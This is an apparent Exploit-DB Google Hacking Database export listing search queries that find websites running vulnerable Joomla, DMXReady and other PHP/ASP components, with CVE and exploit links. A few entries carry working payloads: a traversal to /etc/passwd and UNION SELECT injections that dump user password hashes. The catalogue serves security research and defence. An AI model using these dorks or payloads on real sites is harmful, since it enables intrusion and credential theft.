<edb>https://www.exploit-db.com/exploits/7767</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2139</id>
<link>https://www.exploit-db.com/ghdb/2139</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_contactusmanager.asp</shortDescription>
<textualDescription>DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7768</textualDescription>
<query>inurl:inc_contactusmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_contactusmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7768</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2184</id>
<link>https://www.exploit-db.com/ghdb/2184</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_documentlibrarymanager.asp</shortDescription>
<textualDescription>DMXReady Document Library Manager 1.1 Contents Change Vuln: https://www.exploit-db.com/exploits/7769</textualDescription>
<query>inurl:inc_documentlibrarymanager.asp</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:inc_documentlibrarymanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7769</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2094</id>
<link>https://www.exploit-db.com/ghdb/2094</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_faqsmanager.asp</shortDescription>
<textualDescription>DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7770</textualDescription>
<query>inurl:inc_faqsmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_faqsmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7770</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2174</id>
<link>https://www.exploit-db.com/ghdb/2174</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_joblistingmanager.asp</shortDescription>
<textualDescription>DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7771</textualDescription>
<query>inurl:inc_joblistingmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_joblistingmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7771</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2079</id>
<link>https://www.exploit-db.com/ghdb/2079</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_linksmanager.asp</shortDescription>
<textualDescription>DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7772</textualDescription>
<query>inurl:inc_linksmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_linksmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7772</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2770</id>
<link>https://www.exploit-db.com/ghdb/2770</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_memberdirectorymanager.asp</shortDescription>
<textualDescription>DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: https://www.exploit-db.com/exploits/7773</textualDescription>
<query>inurl:inc_memberdirectorymanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_memberdirectorymanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7773</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2806</id>
<link>https://www.exploit-db.com/ghdb/2806</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_membersareamanager.asp</shortDescription>
<textualDescription>DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7774</textualDescription>
<query>inurl:inc_membersareamanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_membersareamanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7774</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2182</id>
<link>https://www.exploit-db.com/ghdb/2182</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_newsmanager.asp</shortDescription>
<textualDescription>DMXReady News Manager 1.1 Arbitrary Category Change Vuln: https://www.exploit-db.com/exploits/7752</textualDescription>
<query>inurl:inc_newsmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_newsmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7752</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2199</id>
<link>https://www.exploit-db.com/ghdb/2199</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_paypalstoremanager.asp</shortDescription>
<textualDescription>DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7782</textualDescription>
<query>inurl:inc_paypalstoremanager.asp</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:inc_paypalstoremanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7782</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2185</id>
<link>https://www.exploit-db.com/ghdb/2185</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_photogallerymanager.asp</shortDescription>
<textualDescription>DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7783</textualDescription>
<query>inurl:inc_photogallerymanager.asp</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:inc_photogallerymanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7783</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2154</id>
<link>https://www.exploit-db.com/ghdb/2154</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_registrationmanager.asp</shortDescription>
<textualDescription>DMXReady Registration Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7784</textualDescription>
<query>inurl:inc_registrationmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_registrationmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7784</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2847</id>
<link>https://www.exploit-db.com/ghdb/2847</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_securedocumentlibrary.asp</shortDescription>
<textualDescription>DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: https://www.exploit-db.com/exploits/7787</textualDescription>
<query>inurl:inc_securedocumentlibrary.asp</query>
<querystring>https://www.google.com/search?q=inurl%3Ainc_securedocumentlibrary.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7787</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3028</id>
<link>https://www.exploit-db.com/ghdb/3028</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_webblogmanager.asp</shortDescription>
<textualDescription>DMXReady Blog Manager</textualDescription>
<query>inurl:inc_webblogmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_webblogmanager.asp</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1060</id>
<link>https://www.exploit-db.com/ghdb/1060</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php fees shop link.codes merchantAccount</shortDescription>
<textualDescription>Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue.</textualDescription>
<query>inurl:index.php fees shop link.codes merchantAccount</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Aindex.php+fees+shop+link.codes+merchantAccount+</querystring>
<edb></edb>
<date>2005-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1444</id>
<link>https://www.exploit-db.com/ghdb/1444</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php%&quot;Submit%Articles&quot;%&quot;Member%Login&quot;%&quot;Top%Authors&quot;</shortDescription>
<textualDescription>Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: https://www.exploit-db.com/exploits/4221</textualDescription>
<query>inurl:index.php%&quot;Submit%Articles&quot;%&quot;Member%Login&quot;%&quot;Top%Authors&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php%25%22Submit%25Articles%22%25%22Member%25Login%22%25%22Top%25Authors%22</querystring>
<edb>https://www.exploit-db.com/exploits/4221</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3112</id>
<link>https://www.exploit-db.com/ghdb/3112</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php/option?com_flexicontent</shortDescription>
<textualDescription>Joomla Component com_flexicontent Local File Vulnerability: https://www.exploit-db.com/exploits/12185</textualDescription>
<query>inurl:index.php/option?com_flexicontent</query>
<querystring>https://www.google.com/search?q=inurl:index.php/option%3Fcom_flexicontent</querystring>
<edb>https://www.exploit-db.com/exploits/12185</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2449</id>
<link>https://www.exploit-db.com/ghdb/2449</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?ini[langpack]=</shortDescription>
<textualDescription>Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: https://www.exploit-db.com/exploits/3700</textualDescription>
<query>inurl:index.php?ini[langpack]=</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fini[langpack]%3D</querystring>
<edb>https://www.exploit-db.com/exploits/3700</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2866</id>
<link>https://www.exploit-db.com/ghdb/2866</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?menu=adorder</shortDescription>
<textualDescription>ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: https://www.exploit-db.com/exploits/6362</textualDescription>
<query>inurl:index.php?menu=adorder</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3Fmenu%3Dadorder</querystring>
<edb>https://www.exploit-db.com/exploits/6362</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3135</id>
<link>https://www.exploit-db.com/ghdb/3135</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?menu=showcat</shortDescription>
<textualDescription>ACG-ScriptShop (cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: https://www.exploit-db.com/exploits/6364</textualDescription>
<query>inurl:index.php?menu=showcat</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmenu%3Dshowcat</querystring>
<edb>https://www.exploit-db.com/exploits/6364</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3138</id>
<link>https://www.exploit-db.com/ghdb/3138</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?menu=showcat=</shortDescription>
<textualDescription>Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: https://www.exploit-db.com/exploits/6396</textualDescription>
<query>inurl:index.php?menu=showcat=</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmenu%3Dshowcat%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6396</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2150</id>
<link>https://www.exploit-db.com/ghdb/2150</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?mod=ConcoursPhoto</shortDescription>
<textualDescription>KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: https://www.exploit-db.com/exploits/5353</textualDescription>
<query>inurl:index.php?mod=ConcoursPhoto</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmod%3DConcoursPhoto</querystring>
<edb>https://www.exploit-db.com/exploits/5353</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1951</id>
<link>https://www.exploit-db.com/ghdb/1951</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?mod=jeuxflash</shortDescription>
<textualDescription>KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: https://www.exploit-db.com/exploits/5352</textualDescription>
<query>inurl:index.php?mod=jeuxflash</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmod%3Djeuxflash</querystring>
<edb>https://www.exploit-db.com/exploits/5352</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2620</id>
<link>https://www.exploit-db.com/ghdb/2620</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?mod=jeuxflash</shortDescription>
<textualDescription>KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: https://www.exploit-db.com/exploits/4400</textualDescription>
<query>inurl:index.php?mod=jeuxflash</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmod%3Djeuxflash</querystring>
<edb>https://www.exploit-db.com/exploits/4400</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2006</id>
<link>https://www.exploit-db.com/ghdb/2006</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?mod=sondages</shortDescription>
<textualDescription>KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: https://www.exploit-db.com/exploits/4422</textualDescription>
<query>inurl:index.php?mod=sondages</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmod%3Dsondages</querystring>
<edb>https://www.exploit-db.com/exploits/4422</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2760</id>
<link>https://www.exploit-db.com/ghdb/2760</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?mode=game_player</shortDescription>
<textualDescription>Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: https://www.exploit-db.com/exploits/14572</textualDescription>
<query>inurl:index.php?mode=game_player</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fmode%3Dgame_player</querystring>
<edb>https://www.exploit-db.com/exploits/14572</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2898</id>
<link>https://www.exploit-db.com/ghdb/2898</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?myPlantId=</shortDescription>
<textualDescription>Member ID The Fish Index PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12850</textualDescription>
<query>inurl:index.php?myPlantId=</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3FmyPlantId%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12850</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2940</id>
<link>https://www.exploit-db.com/ghdb/2940</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_akobook</shortDescription>
<textualDescription>Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: https://www.exploit-db.com/exploits/8911</textualDescription>
<query>inurl:index.php?option=com_akobook</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3Foption%3Dcom_akobook</querystring>
<edb>https://www.exploit-db.com/exploits/8911</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2671</id>
<link>https://www.exploit-db.com/ghdb/2671</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_allhotels</shortDescription>
<textualDescription>Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: https://www.exploit-db.com/exploits/7568</textualDescription>
<query>inurl:index.php?option=com_allhotels</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_allhotels</querystring>
<edb>https://www.exploit-db.com/exploits/7568</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1864</id>
<link>https://www.exploit-db.com/ghdb/1864</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_calendario</shortDescription>
<textualDescription>Joomla Component com_calendario Blind SQL injection Vulnerability: https://www.exploit-db.com/exploits/10760</textualDescription>
<query>inurl:index.php?option=com_calendario</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_calendario</querystring>
<edb>https://www.exploit-db.com/exploits/10760</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1663</id>
<link>https://www.exploit-db.com/ghdb/1663</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_directory</shortDescription>
<textualDescription>Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: https://www.exploit-db.com/exploits/5047</textualDescription>
<query>inurl:index.php?option=com_directory</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_directory</querystring>
<edb>https://www.exploit-db.com/exploits/5047</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3623</id>
<link>https://www.exploit-db.com/ghdb/3623</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_doqment&amp;cid=</shortDescription>
<textualDescription>Author: KedAns-Dz http://server/index.php?option=com_doqment&amp;cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--</textualDescription>
<query>inurl:index.php?option=com_doqment&amp;cid=</query>
<querystring>https://www.google.com/search?q=inurl:index.php?option=com_doqment&amp;cid=</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3075</id>
<link>https://www.exploit-db.com/ghdb/3075</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_ice</shortDescription>
<textualDescription>Joomla Component com_ice Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11544</textualDescription>
<query>inurl:index.php?option=com_ice</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_ice</querystring>
<edb>https://www.exploit-db.com/exploits/11544</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3364</id>
<link>https://www.exploit-db.com/ghdb/3364</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_jombib</shortDescription>
<textualDescription>Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: https://www.exploit-db.com/exploits/4310</textualDescription>
<query>inurl:index.php?option=com_jombib</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_jombib</querystring>
<edb>https://www.exploit-db.com/exploits/4310</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3065</id>
<link>https://www.exploit-db.com/ghdb/3065</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_joomlaconnect_be</shortDescription>
<textualDescription>Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11578</textualDescription>
<query>inurl:index.php?option=com_joomlaconnect_be</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_joomlaconnect_be</querystring>
<edb>https://www.exploit-db.com/exploits/11578</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1577</id>
<link>https://www.exploit-db.com/ghdb/1577</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_joomradio</shortDescription>
<textualDescription>Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/12400</textualDescription>
<query>inurl:index.php?option=com_joomradio</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_joomradio</querystring>
<edb>https://www.exploit-db.com/exploits/12400</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3095</id>
<link>https://www.exploit-db.com/ghdb/3095</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_liveticker &quot;viewticker&quot;</shortDescription>
<textualDescription>Joomla Component com_liveticker Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11604</textualDescription>
<query>inurl:index.php?option=com_liveticker &quot;viewticker&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_liveticker+%22viewticker%22</querystring>
<edb>https://www.exploit-db.com/exploits/11604</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2853</id>
<link>https://www.exploit-db.com/ghdb/2853</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_lowcosthotels</shortDescription>
<textualDescription>Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: https://www.exploit-db.com/exploits/7567</textualDescription>
<query>inurl:index.php?option=com_lowcosthotels</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3Foption%3Dcom_lowcosthotels</querystring>
<edb>https://www.exploit-db.com/exploits/7567</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3628</id>
<link>https://www.exploit-db.com/ghdb/3628</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_lqm &quot;showResults&quot;</shortDescription>
<textualDescription>Submitter: Snakespc SQL Injection: http://server/index.php?option=com_lqm&amp;query=7&amp;task=showResults&amp;Itemid=158&amp;lang=en&amp;lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us</textualDescription>
<query>inurl:index.php?option=com_lqm &quot;showResults&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_lqm%20%22showResults%22</querystring>
<edb></edb>
<date>2010-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1847</id>
<link>https://www.exploit-db.com/ghdb/1847</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_mambads</shortDescription>
<textualDescription>Mambo Component com_mambads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11719</textualDescription>
<query>inurl:index.php?option=com_mambads</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_mambads</querystring>
<edb>https://www.exploit-db.com/exploits/11719</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1524</id>
<link>https://www.exploit-db.com/ghdb/1524</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_mediaslide</shortDescription>
<textualDescription>Joomla Component com_mediaslide Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10591</textualDescription>
<query>inurl:index.php?option=com_mediaslide</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_mediaslide</querystring>
<edb>https://www.exploit-db.com/exploits/10591</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2555</id>
<link>https://www.exploit-db.com/ghdb/2555</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_NeoRecruit</shortDescription>
<textualDescription>Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: https://www.exploit-db.com/exploits/4305</textualDescription>
<query>inurl:index.php?option=com_NeoRecruit</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_NeoRecruit</querystring>
<edb>https://www.exploit-db.com/exploits/4305</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6081</id>
<link>https://www.exploit-db.com/ghdb/6081</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_newsfeeds</shortDescription>
<textualDescription># Google Dork: inurl:index.php?option=com_newsfeeds
# Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection. This dork
is linked to the following existing exploit:
https://www.exploit-db.com/exploits/48202
# Date: 14/05/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:index.php?option=com_newsfeeds</query>
<querystring>https://www.google.com/search?q=inurl:index.php?option=com_newsfeeds</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2490</id>
<link>https://www.exploit-db.com/ghdb/2490</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_nicetalk</shortDescription>
<textualDescription>Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: https://www.exploit-db.com/exploits/4308</textualDescription>
<query>inurl:index.php?option=com_nicetalk</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_nicetalk</querystring>
<edb>https://www.exploit-db.com/exploits/4308</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1570</id>
<link>https://www.exploit-db.com/ghdb/1570</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_noticia</shortDescription>
<textualDescription>Joomla compnent com_noticia cross site scripting: https://www.exploit-db.com/exploits/10789</textualDescription>
<query>inurl:index.php?option=com_noticia</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_noticia</querystring>
<edb>https://www.exploit-db.com/exploits/10789</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3080</id>
<link>https://www.exploit-db.com/ghdb/3080</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_paxgallery</shortDescription>
<textualDescription>Joomla Component com_paxgallery Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11595</textualDescription>
<query>inurl:index.php?option=com_paxgallery</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_paxgallery</querystring>
<edb>https://www.exploit-db.com/exploits/11595</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1573</id>
<link>https://www.exploit-db.com/ghdb/1573</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_portfolio</shortDescription>
<textualDescription>Joomla Component com_portfolio Local File Disclosure: https://www.exploit-db.com/exploits/12325</textualDescription>
<query>inurl:index.php?option=com_portfolio</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_portfolio</querystring>
<edb>https://www.exploit-db.com/exploits/12325</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3032</id>
<link>https://www.exploit-db.com/ghdb/3032</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_races &quot;raceId&quot;</shortDescription>
<textualDescription>Joomla Component com_races Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11710</textualDescription>
<query>inurl:index.php?option=com_races &quot;raceId&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_races+%22raceId%22</querystring>
<edb>https://www.exploit-db.com/exploits/11710</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1600</id>
<link>https://www.exploit-db.com/ghdb/1600</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_yanc</shortDescription>
<textualDescription>Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: https://www.exploit-db.com/exploits/3944</textualDescription>
<query>inurl:index.php?option=com_yanc</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_yanc</querystring>
<edb>https://www.exploit-db.com/exploits/3944</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1770</id>
<link>https://www.exploit-db.com/ghdb/1770</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_yanc &quot;listid&quot;</shortDescription>
<textualDescription>Joomla Component com_yanc SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11603</textualDescription>
<query>inurl:index.php?option=com_yanc &quot;listid&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_yanc+%22listid%22</querystring>
<edb>https://www.exploit-db.com/exploits/11603</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1746</id>
<link>https://www.exploit-db.com/ghdb/1746</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?option=com_ynews</shortDescription>
<textualDescription>Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: https://www.exploit-db.com/exploits/5072</textualDescription>
<query>inurl:index.php?option=com_ynews</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_ynews</querystring>
<edb>https://www.exploit-db.com/exploits/5072</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2714</id>
<link>https://www.exploit-db.com/ghdb/2714</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?ortupg=</shortDescription>
<textualDescription>CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: https://www.exploit-db.com/exploits/7237</textualDescription>
<query>inurl:index.php?ortupg=</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fortupg%3D</querystring>
<edb>https://www.exploit-db.com/exploits/7237</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1519</id>
<link>https://www.exploit-db.com/ghdb/1519</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?page=en_jobseekers</shortDescription>
